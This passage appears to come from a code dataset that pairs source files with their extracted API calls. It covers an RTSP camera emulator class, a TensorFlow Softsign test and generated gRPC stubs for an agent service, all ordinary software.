2687), 'cv2.moments', 'cv2.moments', (['max_contour'], {}), '(max_contour)\n', (2674, 2687), False, 'import cv2\n'), ((3867, 3913), 'cv2.erode', 'cv2.erode', (['hist_mask_image', 'None'], {'iterations': '(2)'}), '(hist_mask_image, None, iterations=2)\n', (3876, 3913), False, 'import cv2\n'), ((3936, 3983), 'cv2.dilate', 'cv2.dilate', (['hist_mask_image', 'None'], {'iterations': '(2)'}), '(hist_mask_image, None, iterations=2)\n', (3946, 3983), False, 'import cv2\n'), ((4127, 4180), 'cv2.circle', 'cv2.circle', (['frame', 'cnt_centroid', '(5)', '[255, 0, 255]', '(-1)'], {}), '(frame, cnt_centroid, 5, [255, 0, 255], -1)\n', (4137, 4180), False, 'import cv2\n'), ((5300, 5319), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (5316, 5319), False, 'import cv2\n'), ((5829, 5852), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (5850, 5852), False, 'import cv2\n'), ((1407, 1532), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(hand_rect_one_y[i], hand_rect_one_x[i])', '(hand_rect_two_y[i], hand_rect_two_x[i])', '(0, 255, 0)', '(1)'], {}), '(frame, (hand_rect_one_y[i], hand_rect_one_x[i]), (\n hand_rect_two_y[i], hand_rect_two_x[i]), (0, 255, 0), 1)\n', (1420, 1532), False, 'import cv2\n'), ((3037, 3085), 'numpy.array', 'np.array', (['contour[s][:, 0][:, 0]'], {'dtype': 'np.float'}), '(contour[s][:, 0][:, 0], dtype=np.float)\n', (3045, 3085), True, 'import numpy as np\n'), ((3098, 3146), 'numpy.array', 'np.array', (['contour[s][:, 0][:, 1]'], {'dtype': 'np.float'}), '(contour[s][:, 0][:, 1], dtype=np.float)\n', (3106, 3146), True, 'import numpy as np\n'), ((3301, 3316), 'numpy.argmax', 'np.argmax', (['dist'], {}), '(dist)\n', (3310, 3316), True, 'import numpy as np\n'), ((4226, 4270), 'cv2.convexHull', 'cv2.convexHull', (['max_cont'], {'returnPoints': '(False)'}), '(max_cont, returnPoints=False)\n', (4240, 4270), False, 'import cv2\n'), ((4289, 4325), 'cv2.convexityDefects', 'cv2.convexityDefects', (['max_cont', 'hull'], {}), '(max_cont, hull)\n', (4309, 4325), False, 'import cv2\n'), ((4860, 4893), 'pyautogui.moveTo', 'pyautogui.moveTo', (['puntox', 'puntoyf'], {}), '(puntox, puntoyf)\n', (4876, 4893), False, 'import pyautogui\n'), ((4949, 4997), 'cv2.circle', 'cv2.circle', (['frame', 'far_point', '(5)', '[0, 0, 255]', '(-1)'], {}), '(frame, far_point, 5, [0, 0, 255], -1)\n', (4959, 4997), False, 'import cv2\n'), ((5373, 5387), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5384, 5387), False, 'import cv2\n'), ((5438, 5456), 'cv2.flip', 'cv2.flip', (['frame', '(1)'], {}), '(frame, 1)\n', (5446, 5456), False, 'import cv2\n'), ((3169, 3188), 'cv2.subtract', 'cv2.subtract', (['x', 'cx'], {}), '(x, cx)\n', (3181, 3188), False, 'import cv2\n'), ((3214, 3233), 'cv2.subtract', 'cv2.subtract', (['y', 'cy'], {}), '(y, cy)\n', (3226, 3233), False, 'import cv2\n'), ((3262, 3277), 'cv2.add', 'cv2.add', (['xp', 'yp'], {}), '(xp, yp)\n', (3269, 3277), False, 'import cv2\n')]
|
import argparse
import logging
import subprocess
import tempfile
from pathlib import Path
from aiohttp import web
from PIL import Image
from unifi.cams.base import UnifiCamBase
class RTSPCam(UnifiCamBase):
def __init__(self, args: argparse.Namespace, logger: logging.Logger) -> None:
super().__init__(args, logger)
self.args = args
self.event_id = 0
self.snapshot_dir = tempfile.mkdtemp()
self.snapshot_stream = None
self.runner = None
if not self.args.snapshot_url:
self.start_snapshot_stream()
@classmethod
def add_parser(cls, parser: argparse.ArgumentParser) -> None:
super().add_parser(parser)
parser.add_argument("--source", "-s", required=True, help="Stream source")
parser.add_argument(
"--http-api",
default=0,
type=int,
help="Specify a port number to enable the HTTP API (default: disabled)",
)
parser.add_argument(
"--snapshot-url",
"-i",
default=None,
type=str,
required=False,
help="HTTP endpoint to fetch snapshot image from",
)
def start_snapshot_stream(self) -> None:
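        # Spawn (or respawn, if the previous process died) a single ffmpeg
        # process that decodes the RTSP stream and continuously overwrites
        # screen.jpg (-vf fps=1 -update 1) for get_snapshot() to serve.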
if not self.snapshot_stream or self.snapshot_stream.poll() is not None:
cmd = (
f"ffmpeg -nostdin -y -re -rtsp_transport {self.args.rtsp_transport} "
                f'-i "{self.args.source}" '
"-vf fps=1 "
f"-update 1 {self.snapshot_dir}/screen.jpg"
)
self.logger.info(f"Spawning stream for snapshots: {cmd}")
self.snapshot_stream = subprocess.Popen(
cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True
)
async def get_snapshot(self) -> Path:
img_file = Path(self.snapshot_dir, "screen.jpg")
if self.args.snapshot_url:
img_file_fullres = Path(self.snapshot_dir, "screen_fullres.jpg")
self.logger.info(f"Downloading snapshot from {self.args.snapshot_url}")
if await self.fetch_to_file(self.args.snapshot_url, img_file_fullres):
size = 1920, 1080
self.logger.info(f"Resizing image to {size}")
with Image.open(img_file_fullres) as im:
im.thumbnail(size)
im.save(img_file, "JPEG")
else:
                self.logger.info("Could not download snapshot")
else:
self.start_snapshot_stream()
return img_file
async def run(self) -> None:
if self.args.http_api:
self.logger.info(f"Enabling HTTP API on port {self.args.http_api}")
app = web.Application()
async def start_motion(request):
self.logger.debug("Starting motion")
await self.trigger_motion_start()
return web.Response(text="ok")
async def stop_motion(request):
                self.logger.debug("Stopping motion")
await self.trigger_motion_stop()
return web.Response(text="ok")
app.add_routes([web.get("/start_motion", start_motion)])
app.add_routes([web.get("/stop_motion", stop_motion)])
self.runner = web.AppRunner(app)
await self.runner.setup()
site = web.TCPSite(self.runner, port=self.args.http_api)
await site.start()
async def close(self) -> None:
await super().close()
if self.runner:
await self.runner.cleanup()
if self.snapshot_stream:
self.snapshot_stream.kill()
def get_stream_source(self, stream_index: str) -> str:
return self.args.source
|
[
"subprocess.Popen",
"aiohttp.web.Response",
"aiohttp.web.TCPSite",
"PIL.Image.open",
"pathlib.Path",
"tempfile.mkdtemp",
"aiohttp.web.get",
"aiohttp.web.AppRunner",
"aiohttp.web.Application"
] |
[((411, 429), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (427, 429), False, 'import tempfile\n'), ((1861, 1898), 'pathlib.Path', 'Path', (['self.snapshot_dir', '"""screen.jpg"""'], {}), "(self.snapshot_dir, 'screen.jpg')\n", (1865, 1898), False, 'from pathlib import Path\n'), ((1681, 1772), 'subprocess.Popen', 'subprocess.Popen', (['cmd'], {'stdout': 'subprocess.DEVNULL', 'stderr': 'subprocess.DEVNULL', 'shell': '(True)'}), '(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,\n shell=True)\n', (1697, 1772), False, 'import subprocess\n'), ((1965, 2010), 'pathlib.Path', 'Path', (['self.snapshot_dir', '"""screen_fullres.jpg"""'], {}), "(self.snapshot_dir, 'screen_fullres.jpg')\n", (1969, 2010), False, 'from pathlib import Path\n'), ((2745, 2762), 'aiohttp.web.Application', 'web.Application', ([], {}), '()\n', (2760, 2762), False, 'from aiohttp import web\n'), ((3317, 3335), 'aiohttp.web.AppRunner', 'web.AppRunner', (['app'], {}), '(app)\n', (3330, 3335), False, 'from aiohttp import web\n'), ((3393, 3442), 'aiohttp.web.TCPSite', 'web.TCPSite', (['self.runner'], {'port': 'self.args.http_api'}), '(self.runner, port=self.args.http_api)\n', (3404, 3442), False, 'from aiohttp import web\n'), ((2935, 2958), 'aiohttp.web.Response', 'web.Response', ([], {'text': '"""ok"""'}), "(text='ok')\n", (2947, 2958), False, 'from aiohttp import web\n'), ((3129, 3152), 'aiohttp.web.Response', 'web.Response', ([], {'text': '"""ok"""'}), "(text='ok')\n", (3141, 3152), False, 'from aiohttp import web\n'), ((2295, 2323), 'PIL.Image.open', 'Image.open', (['img_file_fullres'], {}), '(img_file_fullres)\n', (2305, 2323), False, 'from PIL import Image\n'), ((3182, 3220), 'aiohttp.web.get', 'web.get', (['"""/start_motion"""', 'start_motion'], {}), "('/start_motion', start_motion)\n", (3189, 3220), False, 'from aiohttp import web\n'), ((3251, 3287), 'aiohttp.web.get', 'web.get', (['"""/stop_motion"""', 'stop_motion'], {}), "('/stop_motion', stop_motion)\n", (3258, 3287), False, 'from aiohttp import web\n')]
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Softsign and SoftsignGrad."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class SoftsignTest(test.TestCase):
def _npSoftsign(self, np_features):
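    # Reference implementation: softsign(x) = x / (1 + |x|).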
return np_features / (1 + np.abs(np_features))
def _testSoftsign(self, np_features, use_gpu=False):
np_softsign = self._npSoftsign(np_features)
with self.cached_session(use_gpu=use_gpu):
softsign = nn_ops.softsign(np_features)
tf_softsign = self.evaluate(softsign)
self.assertAllClose(np_softsign, tf_softsign)
self.assertShapeEqual(np_softsign, softsign)
def testNumbers(self):
    for t in [np.float64, np.double]:
self._testSoftsign(
np.array([[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]]).astype(t),
use_gpu=False)
self._testSoftsign(
np.array([[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]]).astype(t),
use_gpu=True)
def testGradient(self):
with self.cached_session():
x = constant_op.constant(
[-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7, 0.9],
shape=[2, 5],
name="x")
y = nn_ops.softsign(x, name="softsign")
x_init = np.asarray(
[[-0.9, -0.7, -0.5, -0.3, -0.1], [0.1, 0.3, 0.5, 0.7, 0.9]],
dtype=np.float32,
order="F")
err = gradient_checker.compute_gradient_error(
x, [2, 5], y, [2, 5], x_init_value=x_init)
print("softsign (float) gradient err = ", err)
self.assertLess(err, 1e-4)
def testNoInts(self):
with self.cached_session():
with self.assertRaisesRegexp(
TypeError,
"'features' has DataType int32 not in list of allowed values"):
nn_ops.softsign(constant_op.constant(7)).eval()
if __name__ == "__main__":
test.main()
|
[
"tensorflow.python.platform.test.main",
"tensorflow.python.ops.gradient_checker.compute_gradient_error",
"numpy.abs",
"numpy.asarray",
"tensorflow.python.framework.constant_op.constant",
"tensorflow.python.ops.nn_ops.softsign",
"numpy.array"
] |
[((2751, 2762), 'tensorflow.python.platform.test.main', 'test.main', ([], {}), '()\n', (2760, 2762), False, 'from tensorflow.python.platform import test\n'), ((1416, 1444), 'tensorflow.python.ops.nn_ops.softsign', 'nn_ops.softsign', (['np_features'], {}), '(np_features)\n', (1431, 1444), False, 'from tensorflow.python.ops import nn_ops\n'), ((1962, 2068), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['[-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7, 0.9]'], {'shape': '[2, 5]', 'name': '"""x"""'}), "([-0.9, -0.7, -0.5, -0.3, -0.1, 0.1, 0.3, 0.5, 0.7, 0.9\n ], shape=[2, 5], name='x')\n", (1982, 2068), False, 'from tensorflow.python.framework import constant_op\n'), ((2105, 2140), 'tensorflow.python.ops.nn_ops.softsign', 'nn_ops.softsign', (['x'], {'name': '"""softsign"""'}), "(x, name='softsign')\n", (2120, 2140), False, 'from tensorflow.python.ops import nn_ops\n'), ((2156, 2260), 'numpy.asarray', 'np.asarray', (['[[-0.9, -0.7, -0.5, -0.3, -0.1], [0.1, 0.3, 0.5, 0.7, 0.9]]'], {'dtype': 'np.float32', 'order': '"""F"""'}), "([[-0.9, -0.7, -0.5, -0.3, -0.1], [0.1, 0.3, 0.5, 0.7, 0.9]],\n dtype=np.float32, order='F')\n", (2166, 2260), True, 'import numpy as np\n'), ((2300, 2387), 'tensorflow.python.ops.gradient_checker.compute_gradient_error', 'gradient_checker.compute_gradient_error', (['x', '[2, 5]', 'y', '[2, 5]'], {'x_init_value': 'x_init'}), '(x, [2, 5], y, [2, 5], x_init_value=\n x_init)\n', (2339, 2387), False, 'from tensorflow.python.ops import gradient_checker\n'), ((1227, 1246), 'numpy.abs', 'np.abs', (['np_features'], {}), '(np_features)\n', (1233, 1246), True, 'import numpy as np\n'), ((1686, 1735), 'numpy.array', 'np.array', (['[[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]]'], {}), '([[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]])\n', (1694, 1735), True, 'import numpy as np\n'), ((1808, 1857), 'numpy.array', 'np.array', (['[[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]]'], {}), '([[-9, 7, -5, 3, -1], [1, -3, 5, -7, 9]])\n', (1816, 1857), True, 'import numpy as np\n'), ((2688, 2711), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(7)'], {}), '(7)\n', (2708, 2711), False, 'from tensorflow.python.framework import constant_op\n')]
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
import example_pb2 as example__pb2
class AgentStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.InitializeAgents = channel.unary_unary(
'/Agent/InitializeAgents',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleMessage = channel.unary_unary(
'/Agent/HandleMessage',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.InvokeSoloAgent = channel.unary_unary(
'/Agent/InvokeSoloAgent',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.GetAgents = channel.unary_unary(
'/Agent/GetAgents',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.SetAgentFields = channel.unary_unary(
'/Agent/SetAgentFields',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleSlashCommand = channel.unary_unary(
'/Agent/HandleSlashCommand',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleUserUpdate = channel.unary_unary(
'/Agent/HandleUserUpdate',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
self.HandleMessageReaction = channel.unary_unary(
'/Agent/HandleMessageReaction',
request_serializer=example__pb2.Request.SerializeToString,
response_deserializer=example__pb2.Response.FromString,
)
class AgentServicer(object):
"""Missing associated documentation comment in .proto file."""
def InitializeAgents(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleMessage(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def InvokeSoloAgent(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAgents(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetAgentFields(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleSlashCommand(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleUserUpdate(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def HandleMessageReaction(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AgentServicer_to_server(servicer, server):
rpc_method_handlers = {
'InitializeAgents': grpc.unary_unary_rpc_method_handler(
servicer.InitializeAgents,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleMessage': grpc.unary_unary_rpc_method_handler(
servicer.HandleMessage,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'InvokeSoloAgent': grpc.unary_unary_rpc_method_handler(
servicer.InvokeSoloAgent,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'GetAgents': grpc.unary_unary_rpc_method_handler(
servicer.GetAgents,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'SetAgentFields': grpc.unary_unary_rpc_method_handler(
servicer.SetAgentFields,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleSlashCommand': grpc.unary_unary_rpc_method_handler(
servicer.HandleSlashCommand,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleUserUpdate': grpc.unary_unary_rpc_method_handler(
servicer.HandleUserUpdate,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
'HandleMessageReaction': grpc.unary_unary_rpc_method_handler(
servicer.HandleMessageReaction,
request_deserializer=example__pb2.Request.FromString,
response_serializer=example__pb2.Response.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Agent', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Agent(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def InitializeAgents(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/InitializeAgents',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleMessage(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleMessage',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def InvokeSoloAgent(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/InvokeSoloAgent',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetAgents(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/GetAgents',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetAgentFields(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/SetAgentFields',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleSlashCommand(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleSlashCommand',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleUserUpdate(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleUserUpdate',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def HandleMessageReaction(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Agent/HandleMessageReaction',
example__pb2.Request.SerializeToString,
example__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
[
"grpc.method_handlers_generic_handler",
"grpc.unary_unary_rpc_method_handler",
"grpc.experimental.unary_unary"
] |
[((7315, 7381), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""Agent"""', 'rpc_method_handlers'], {}), "('Agent', rpc_method_handlers)\n", (7351, 7381), False, 'import grpc\n'), ((5043, 5228), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.InitializeAgents'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.InitializeAgents,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (5078, 5228), False, 'import grpc\n'), ((5326, 5508), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.HandleMessage'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.HandleMessage,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (5361, 5508), False, 'import grpc\n'), ((5608, 5792), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.InvokeSoloAgent'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.InvokeSoloAgent,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (5643, 5792), False, 'import grpc\n'), ((5886, 6064), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.GetAgents'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.GetAgents,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (5921, 6064), False, 'import grpc\n'), ((6163, 6346), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.SetAgentFields'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.SetAgentFields,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (6198, 6346), False, 'import grpc\n'), ((6449, 6636), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.HandleSlashCommand'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.HandleSlashCommand,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (6484, 6636), False, 'import grpc\n'), ((6737, 6922), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.HandleUserUpdate'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.HandleUserUpdate,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (6772, 6922), False, 'import grpc\n'), ((7028, 7218), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.HandleMessageReaction'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 
'example__pb2.Response.SerializeToString'}), '(servicer.HandleMessageReaction,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (7063, 7218), False, 'import grpc\n'), ((7917, 8183), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/InitializeAgents"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/InitializeAgents',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (7946, 8183), False, 'import grpc\n'), ((8546, 8809), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/HandleMessage"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/HandleMessage',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (8575, 8809), False, 'import grpc\n'), ((9174, 9439), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/InvokeSoloAgent"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/InvokeSoloAgent',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (9203, 9439), False, 'import grpc\n'), ((9798, 10057), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/GetAgents"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/GetAgents',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (9827, 10057), False, 'import grpc\n'), ((10421, 10685), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/SetAgentFields"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/SetAgentFields',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (10450, 10685), False, 'import grpc\n'), ((11053, 11321), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/HandleSlashCommand"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 
'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/HandleSlashCommand',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (11082, 11321), False, 'import grpc\n'), ((11687, 11953), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/HandleUserUpdate"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/HandleUserUpdate',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (11716, 11953), False, 'import grpc\n'), ((12324, 12594), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/HandleMessageReaction"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/Agent/HandleMessageReaction', example__pb2.Request.SerializeToString,\n example__pb2.Response.FromString, options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n", (12353, 12594), False, 'import grpc\n')]
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
